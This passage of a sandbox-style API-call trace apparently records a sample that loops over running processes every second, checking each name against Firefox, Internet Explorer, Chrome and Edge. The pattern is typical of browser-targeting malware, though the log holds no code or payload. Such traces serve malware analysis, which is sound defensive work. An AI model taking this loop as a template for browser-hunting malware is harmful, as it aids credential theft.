lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0251.576] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0251.576] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0251.576] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0251.576] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.576] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0251.577] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0251.577] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0251.577] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0251.577] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.577] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0251.577] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0251.577] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0251.577] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0251.577] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.577] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0251.578] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0251.578] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0251.578] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0251.578] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.578] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0251.578] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0251.578] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0251.578] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0251.578] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.578] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0251.579] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0251.579] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0251.579] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0251.579] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.579] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0251.580] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0251.580] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0251.580] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0251.580] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.580] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.580] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0251.580] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0251.580] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0251.580] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.580] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0251.581] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0251.581] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0251.581] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0251.581] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.581] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.581] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0251.581] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0251.581] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0251.581] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.581] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0251.582] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0251.582] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0251.582] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0251.582] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.582] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0251.582] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0251.582] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0251.582] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0251.582] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.583] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0251.583] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0251.583] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0251.583] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0251.583] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.583] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0251.584] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0251.584] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0251.584] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0251.584] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.584] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0251.584] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0251.584] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0251.584] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0251.584] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.584] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0251.585] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0251.585] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0251.585] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0251.585] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.585] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0251.585] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0251.585] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0251.585] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0251.585] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.585] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0251.586] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0251.586] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0251.586] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0251.586] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.586] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0251.586] CloseHandle (hObject=0xd4) returned 1 [0251.586] Sleep (dwMilliseconds=0x3e8) [0252.597] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0252.598] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.599] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0252.599] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0252.599] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0252.599] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0252.599] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0252.599] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0252.599] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0252.599] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0252.599] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0252.600] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0252.600] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0252.600] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0252.600] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0252.600] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.600] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0252.601] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0252.601] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0252.601] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0252.601] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.601] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0252.601] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0252.601] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0252.601] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0252.601] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.601] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0252.602] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0252.602] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0252.602] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0252.602] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.602] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0252.602] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0252.602] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0252.602] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0252.602] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.602] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0252.603] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0252.603] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0252.603] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0252.603] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.603] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0252.603] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0252.603] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0252.603] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0252.604] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.604] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0252.604] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0252.604] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0252.604] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0252.604] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.604] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.605] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0252.605] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0252.605] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0252.605] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.605] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.605] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0252.605] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0252.605] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0252.605] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.605] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.606] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0252.606] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0252.606] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0252.606] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.606] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.606] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0252.607] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0252.607] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0252.607] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.607] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.607] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0252.607] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0252.607] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0252.607] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.607] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0252.608] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0252.608] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0252.608] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0252.608] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.608] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.608] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0252.608] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0252.608] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0252.608] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.608] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.609] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0252.609] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0252.609] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0252.609] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.609] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0252.609] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0252.609] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0252.609] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0252.609] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.609] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0252.610] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0252.610] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0252.610] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0252.610] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.610] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0252.610] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0252.611] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0252.611] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0252.611] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.611] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.611] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0252.611] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0252.611] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0252.611] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.611] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 